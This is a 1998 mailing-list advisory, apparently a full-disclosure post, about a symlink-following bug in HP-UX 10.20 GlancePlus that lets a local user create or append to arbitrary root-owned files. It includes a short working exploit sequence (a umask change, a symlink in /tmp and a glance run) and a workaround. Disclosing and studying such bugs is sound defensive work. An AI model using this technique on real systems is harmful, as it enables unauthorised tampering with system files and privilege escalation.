HP-UX glance bug (#4?)

From: J.A. Gutierrez (spdat_private)
Date: Mon Apr 27 1998 - 14:31:12 PDT

        * Software:

        HP-UX B.10.20 D
        Glance.Runtime.GLANCE                 B.10.20.95     HP GlancePlus files

        * Bug:

        glance creates a /tmp/status.dce file as root, and it follows
        symlinks, so you can append text like

    Pid: 16208  File: ndi_sm.c         Line:   2609   Mon Apr 27 21:52:23 1998
    Performance Management Application registered.

        to any system file.

        * Sample exploit:

        $ umask 000
            $ cd /tmp
        $ ln -s /.test status.dce
        $ glance -j 1 -iterations 1 -maxpages 1
        $ ls -l /.test
        -rw-rw-rw-   1 root       bar           1080 Apr 27 23:06 /.test

        # edit /.test to match your needs

            * Workaround:

            I guess creating a non writable /tmp/status.dce file
            and setting the t bit on /tmp (which it seems it has
            not in the default HPUX installation) would be enough

        * Note: I've been looking for HP-UX bugs, and I have found
        several reported holes in glance; but it seems this one
        is new...

    --
        J.A. Gutierrez                                   So be easy and free
                                                when you're drinking with me